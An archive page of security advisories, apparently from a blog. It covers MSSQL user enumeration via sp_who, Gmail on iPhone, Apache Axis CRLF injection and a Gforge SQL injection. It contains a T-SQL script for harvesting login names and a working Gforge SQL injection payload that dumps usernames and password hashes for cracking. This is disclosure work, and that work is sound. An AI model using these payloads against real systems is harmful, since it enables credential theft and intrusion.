Category Archives: Advisories

MS-SQL [2000&2005] User Enumeration Via sp_who

In SQL Server 2005, a login that is not ‘sa’ (or otherwise a member of sysadmin) can do very little. This is primarily because OPENROWSET ad hoc queries are disabled by default, and enabling them requires sysadmin rights. The stored procedure sp_who, however, is executable by the public role in both MSSQL 2000 and 2005. This procedure “provides information about current Microsoft® SQL Server™ users and processes”.… Read More
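One way to turn that into a list of login names from a low-privilege login, as an added T-SQL example that is not part of the original advisory (it assumes a SQL Server 2005 instance and the nine-column sp_who result set of that version; the temp-table name is arbitrary):

```sql
-- Added example, not code from the original advisory.
-- Assumption: the temp-table layout matches the SQL Server 2005 sp_who
-- result set (spid, ecid, status, loginame, hostname, blk, dbname, cmd,
-- request_id). INSERT ... EXEC fails unless the column count matches
-- exactly, so on SQL Server 2000 drop the request_id column.
CREATE TABLE #who (
    spid       smallint,
    ecid       smallint,
    status     nchar(30),
    loginame   nchar(128),
    hostname   nchar(128),
    blk        char(5),
    dbname     nchar(128),
    cmd        nchar(16),
    request_id int
);

-- sp_who is executable by the public role, so no sysadmin rights are needed.
INSERT INTO #who EXEC sp_who;

-- Distinct logins that currently have a session, with the host they
-- connect from and the database they are using. System sessions
-- (typically spid below 50) are reported under sa, so they are of little
-- interest for enumeration.
SELECT DISTINCT RTRIM(loginame) AS login_name,
                RTRIM(hostname) AS host_name,
                RTRIM(dbname)   AS db_name
FROM #who
WHERE LTRIM(RTRIM(loginame)) <> ''
  AND spid >= 50
ORDER BY login_name;

DROP TABLE #who;
```

sp_who only reports sessions that exist at the moment it runs, so the harvest is a snapshot; repeating it over time (or during business hours) is what builds a usable list of login names to try elsewhere.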

Gmail on iPhone..notsosecure

If you are concerned about the security of your emails, accessing Gmail from a mobile device may not be a great idea. 1. A few weeks ago, Google introduced a new feature in Gmail through which you can force the Gmail session to never use plain HTTP, and only… Read More

Apache Axis CRLF And Content Injection

Version tested: 1.4
Vendor's website: http://ws.apache.org/axis/
Details: The vulnerability reported earlier this year was later addressed by the Apache Axis group, and the error messages in version 1.4 no longer leak the document root or any directory structure. However, the error message returned for a non-existent WSDL is vulnerable to CRLF… Read More

Gforge SQL Injection

Original Advisory: http://www.portcullis-security.com/179.php The file /www/people/editprofile.php appears to be vulnerable to SQL injection at multiple points. The exploit is fairly easy: a single POST request returns all the usernames and password hashes from the backend database. The hashes can then be cracked using John the Ripper. Exploit: a POST request to /www/people/editprofile.php with the body skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+from+users--%3d1&MultiDelete=Delete (URL-decoded, skill_delete[] becomes 484) UNION ALL SELECT user_name||unix_pw from users--=1, which closes the application's own parenthesis and appends a UNION over the users table; || is PostgreSQL string concatenation, so each returned row is the username immediately followed by its hash) works against… Read More